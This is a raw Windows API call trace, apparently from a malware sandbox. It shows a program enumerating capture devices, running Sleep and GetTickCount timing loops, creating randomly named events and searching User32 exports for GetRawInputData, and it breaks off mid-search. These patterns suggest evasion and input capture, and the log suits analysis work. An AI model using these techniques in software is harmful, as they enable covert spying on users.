[0192.565] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0x50) returned 0x7c6bb0
[0192.565] GetProcessHeap () returned 0x7c0000
[0192.565] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x8, Size=0xa0) returned 0x7c8e20
[0192.565] CoInitialize (pvReserved=0x0) returned 0x0
[0192.654] CoCreateInstance (in: rclsid=0x4145e0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4173f0*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x19fef8 | out: ppv=0x19fef8*=0x21704a0) returned 0x0
[0194.446] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0x21704a0, clsidDeviceClass=0x4145d0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x19fefc, dwFlags=0x0 | out: ppenumMoniker=0x19fefc*=0x0) returned 0x1
[0197.096] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x7a0000
[0197.096] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x7b0000
[0197.097] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
[0197.097] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000
[0197.097] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
[0197.097] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
[0197.097] GetProcessHeap () returned 0x7c0000
[0197.097] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7dc7a8
[0197.097] GetProcessHeap () returned 0x7c0000
[0197.097] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7dc640
[0197.097] GetProcessHeap () returned 0x7c0000
[0197.098] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7dc898
[0197.098] GetProcessHeap () returned 0x7c0000
[0197.098] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7dc7d0
[0197.098] GetProcessHeap () returned 0x7c0000
[0197.098] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7dc7f8
[0197.098] GetProcessHeap () returned 0x7c0000
[0197.098] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x19) returned 0x7dc938
[0197.230] Sleep (dwMilliseconds=0x1)
[0197.363] GetTickCount () returned 0x1904aea
[0197.363] Sleep (dwMilliseconds=0x1)
[0197.400] GetTickCount () returned 0x1904b19
[0197.400] Sleep (dwMilliseconds=0x1)
[0197.447] GetTickCount () returned 0x1904b47
[0197.447] Sleep (dwMilliseconds=0x1)
[0197.494] GetTickCount () returned 0x1904b76
[0197.494] Sleep (dwMilliseconds=0x1)
[0197.509] GetTickCount () returned 0x1904b86
[0197.509] Sleep (dwMilliseconds=0x1)
[0197.525] GetTickCount () returned 0x1904b96
[0197.525] Sleep (dwMilliseconds=0x1)
[0197.541] GetTickCount () returned 0x1904ba5
[0197.541] Sleep (dwMilliseconds=0x1)
[0197.556] GetTickCount () returned 0x1904bb5
[0197.556] Sleep (dwMilliseconds=0x1)
[0197.572] GetTickCount () returned 0x1904bc4
[0197.572] Sleep (dwMilliseconds=0x1)
[0197.588] GetTickCount () returned 0x1904bd4
[0197.588] Sleep (dwMilliseconds=0x1)
[0197.603] GetTickCount () returned 0x1904be4
[0197.603] Sleep (dwMilliseconds=0x1)
[0197.619] GetTickCount () returned 0x1904bf3
[0197.619] Sleep (dwMilliseconds=0x1)
[0197.634] GetTickCount () returned 0x1904c03
[0197.634] Sleep (dwMilliseconds=0x1)
[0197.650] GetTickCount () returned 0x1904c13
[0197.650] Sleep (dwMilliseconds=0x1)
[0197.666] GetTickCount () returned 0x1904c22
[0197.666] Sleep (dwMilliseconds=0x1)
[0197.681] GetTickCount () returned 0x1904c32
[0197.681] Sleep (dwMilliseconds=0x1)
[0197.700] GetTickCount () returned 0x1904c41
[0197.705] Sleep (dwMilliseconds=0x1)
[0197.714] GetTickCount () returned 0x1904c51
[0197.714] Sleep (dwMilliseconds=0x1)
[0197.739] GetTickCount () returned 0x1904c61
[0197.740] Sleep (dwMilliseconds=0x1)
[0197.744] GetTickCount () returned 0x1904c70
[0197.744] Sleep (dwMilliseconds=0x1)
[0197.759] GetTickCount () returned 0x1904c80
[0197.759] Sleep (dwMilliseconds=0x1)
[0197.775] GetTickCount () returned 0x1904c90
[0197.775] Sleep (dwMilliseconds=0x1)
[0197.861] GetTickCount () returned 0x1904cde
[0197.861] Sleep (dwMilliseconds=0x1)
[0197.904] GetTickCount () returned 0x1904d0d
[0197.904] Sleep (dwMilliseconds=0x1)
[0197.947] GetTickCount () returned 0x1904d3b
[0197.947] Sleep (dwMilliseconds=0x1)
[0197.997] GetTickCount () returned 0x1904d6a
[0197.997] Sleep (dwMilliseconds=0x1)
[0198.042] GetTickCount () returned 0x1904d99
[0198.042] Sleep (dwMilliseconds=0x1)
[0198.369] GetTickCount () returned 0x1904ee1
[0198.369] Sleep (dwMilliseconds=0x1)
[0198.385] GetTickCount () returned 0x1904ef1
[0198.385] Sleep (dwMilliseconds=0x1)
[0198.401] GetTickCount () returned 0x1904f01
[0198.401] Sleep (dwMilliseconds=0x1)
[0198.425] GetTickCount () returned 0x1904f10
[0198.425] Sleep (dwMilliseconds=0x1)
[0198.433] GetTickCount () returned 0x1904f20
[0198.433] Sleep (dwMilliseconds=0x1)
[0198.448] GetTickCount () returned 0x1904f2f
[0198.448] Sleep (dwMilliseconds=0x1)
[0198.463] GetTickCount () returned 0x1904f3f
[0198.463] Sleep (dwMilliseconds=0x1)
[0198.485] GetTickCount () returned 0x1904f4f
[0198.485] Sleep (dwMilliseconds=0x1)
[0198.495] GetTickCount () returned 0x1904f5e
[0198.495] Sleep (dwMilliseconds=0x1)
[0198.509] GetTickCount () returned 0x1904f6e
[0198.509] Sleep (dwMilliseconds=0x1)
[0198.525] GetTickCount () returned 0x1904f7e
[0198.525] Sleep (dwMilliseconds=0x1)
[0198.541] GetTickCount () returned 0x1904f8d
[0198.541] Sleep (dwMilliseconds=0x1)
[0198.557] GetTickCount () returned 0x1904f9d
[0198.557] Sleep (dwMilliseconds=0x1)
[0198.572] GetTickCount () returned 0x1904fac
[0198.572] Sleep (dwMilliseconds=0x1)
[0198.612] GetTickCount () returned 0x1904fcc
[0198.613] Sleep (dwMilliseconds=0x1)
[0198.619] GetTickCount () returned 0x1904fdb
[0198.619] Sleep (dwMilliseconds=0x1)
[0198.635] GetTickCount () returned 0x1904feb
[0198.635] Sleep (dwMilliseconds=0x1)
[0198.650] GetTickCount () returned 0x1904ffb
[0198.650] Sleep (dwMilliseconds=0x1)
[0198.666] GetTickCount () returned 0x190500a
[0198.666] Sleep (dwMilliseconds=0x1)
[0198.682] GetTickCount () returned 0x190501a
[0198.682] Sleep (dwMilliseconds=0x1)
[0198.697] GetTickCount () returned 0x1905029
[0198.697] Sleep (dwMilliseconds=0x1)
[0198.715] GetTickCount () returned 0x1905039
[0198.715] Sleep (dwMilliseconds=0x1)
[0198.747] GetTickCount () returned 0x1905058
[0198.747] Sleep (dwMilliseconds=0x1)
[0198.771] GetTickCount () returned 0x1905078
[0198.771] Sleep (dwMilliseconds=0x1)
[0198.773] GetTickCount () returned 0x1905078
[0198.773] Sleep (dwMilliseconds=0x1)
[0198.774] GetTickCount () returned 0x1905078
[0198.774] Sleep (dwMilliseconds=0x1)
[0198.776] GetTickCount () returned 0x1905078
[0198.776] Sleep (dwMilliseconds=0x1)
[0198.777] GetTickCount () returned 0x1905078
[0198.777] Sleep (dwMilliseconds=0x1)
[0198.779] GetTickCount () returned 0x1905078
[0198.779] Sleep (dwMilliseconds=0x1)
[0198.780] GetTickCount () returned 0x1905078
[0198.781] Sleep (dwMilliseconds=0x1)
[0198.782] GetTickCount () returned 0x1905078
[0198.782] Sleep (dwMilliseconds=0x1)
[0198.783] GetTickCount () returned 0x1905078
[0198.784] Sleep (dwMilliseconds=0x1)
[0198.785] GetTickCount () returned 0x1905078
[0198.785] lstrlenA (lpString="ioFWUERwa4") returned 10
[0198.785] lstrlenA (lpString="ioFWUERwa4") returned 10
[0198.785] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
[0198.786] lstrcpyA (in: lpString1=0x2180000, lpString2="ioFWUERwa4" | out: lpString1="ioFWUERwa4") returned="ioFWUERwa4"
[0198.786] VirtualFree (lpAddress=0x7a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.788] lstrlenA (lpString="ioFWUERwa4") returned 10
[0198.788] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x7a0000
[0198.789] lstrcatA (in: lpString1="", lpString2="ioFWUERwa4" | out: lpString1="ioFWUERwa4") returned="ioFWUERwa4"
[0198.789] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="ioFWUERwa4") returned 0x21c
[0198.789] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.790] lstrlenA (lpString="k8HscufiDe") returned 10
[0198.790] lstrlenA (lpString="k8HscufiDe") returned 10
[0198.790] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
[0198.792] lstrcpyA (in: lpString1=0x2180000, lpString2="k8HscufiDe" | out: lpString1="k8HscufiDe") returned="k8HscufiDe"
[0198.792] VirtualFree (lpAddress=0x7b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.793] lstrlenA (lpString="k8HscufiDe") returned 10
[0198.793] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x7b0000
[0198.793] lstrcatA (in: lpString1="", lpString2="k8HscufiDe" | out: lpString1="k8HscufiDe") returned="k8HscufiDe"
[0198.793] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="k8HscufiDe") returned 0x244
[0198.793] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.794] lstrlenA (lpString="G24yrYdC3y") returned 10
[0198.794] lstrlenA (lpString="G24yrYdC3y") returned 10
[0198.794] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
[0198.795] lstrcpyA (in: lpString1=0x2180000, lpString2="G24yrYdC3y" | out: lpString1="G24yrYdC3y") returned="G24yrYdC3y"
[0198.795] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.795] lstrlenA (lpString="G24yrYdC3y") returned 10
[0198.795] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
[0198.796] lstrcatA (in: lpString1="", lpString2="G24yrYdC3y" | out: lpString1="G24yrYdC3y") returned="G24yrYdC3y"
[0198.796] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="G24yrYdC3y") returned 0x248
[0198.796] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.797] lstrlenA (lpString="qyt6legS5Y") returned 10
[0198.797] lstrlenA (lpString="qyt6legS5Y") returned 10
[0198.797] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
[0198.797] lstrcpyA (in: lpString1=0x2180000, lpString2="qyt6legS5Y" | out: lpString1="qyt6legS5Y") returned="qyt6legS5Y"
[0198.797] VirtualFree (lpAddress=0x20b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.797] lstrlenA (lpString="qyt6legS5Y") returned 10
[0198.798] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000
[0198.798] lstrcatA (in: lpString1="", lpString2="qyt6legS5Y" | out: lpString1="qyt6legS5Y") returned="qyt6legS5Y"
[0198.798] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="qyt6legS5Y") returned 0x24c
[0198.798] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.798] lstrlenA (lpString="MsvYLeowTs") returned 10
[0198.798] lstrlenA (lpString="MsvYLeowTs") returned 10
[0198.798] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
[0198.799] lstrcpyA (in: lpString1=0x2180000, lpString2="MsvYLeowTs" | out: lpString1="MsvYLeowTs") returned="MsvYLeowTs"
[0198.799] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.799] lstrlenA (lpString="MsvYLeowTs") returned 10
[0198.799] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
[0198.799] lstrcatA (in: lpString1="", lpString2="MsvYLeowTs" | out: lpString1="MsvYLeowTs") returned="MsvYLeowTs"
[0198.799] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="MsvYLeowTs") returned 0x250
[0198.800] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.800] lstrlenA (lpString="emu2SuKSaK") returned 10
[0198.800] lstrlenA (lpString="emu2SuKSaK") returned 10
[0198.800] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
[0198.800] lstrcpyA (in: lpString1=0x2180000, lpString2="emu2SuKSaK" | out: lpString1="emu2SuKSaK") returned="emu2SuKSaK"
[0198.800] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.801] lstrlenA (lpString="emu2SuKSaK") returned 10
[0198.801] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
[0198.801] lstrcatA (in: lpString1="", lpString2="emu2SuKSaK" | out: lpString1="emu2SuKSaK") returned="emu2SuKSaK"
[0198.801] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="emu2SuKSaK") returned 0x254
[0198.801] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0198.823] GetProcessHeap () returned 0x7c0000
[0198.823] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x54) returned 0x7c6a10
[0198.842] GetProcessHeap () returned 0x7c0000
[0198.842] RtlAllocateHeap (HeapHandle=0x7c0000, Flags=0x0, Size=0x7c) returned 0x7ca788
[0198.861] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x258
[0198.862] LoadLibraryW (lpLibFileName="User32.dll") returned 0x743d0000
[0198.862] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1
[0198.866] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1
[0198.867] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckDBCSEnabledExt", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckProcessForClipboardAccess", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckProcessSession", lpString2="GetRawInputData") returned -1
[0198.868] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDCompositionHwndTarget", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1
[0198.869] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowInBand", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowInBandEx", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowIndirect", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1
[0198.870] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1
[0198.871] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1
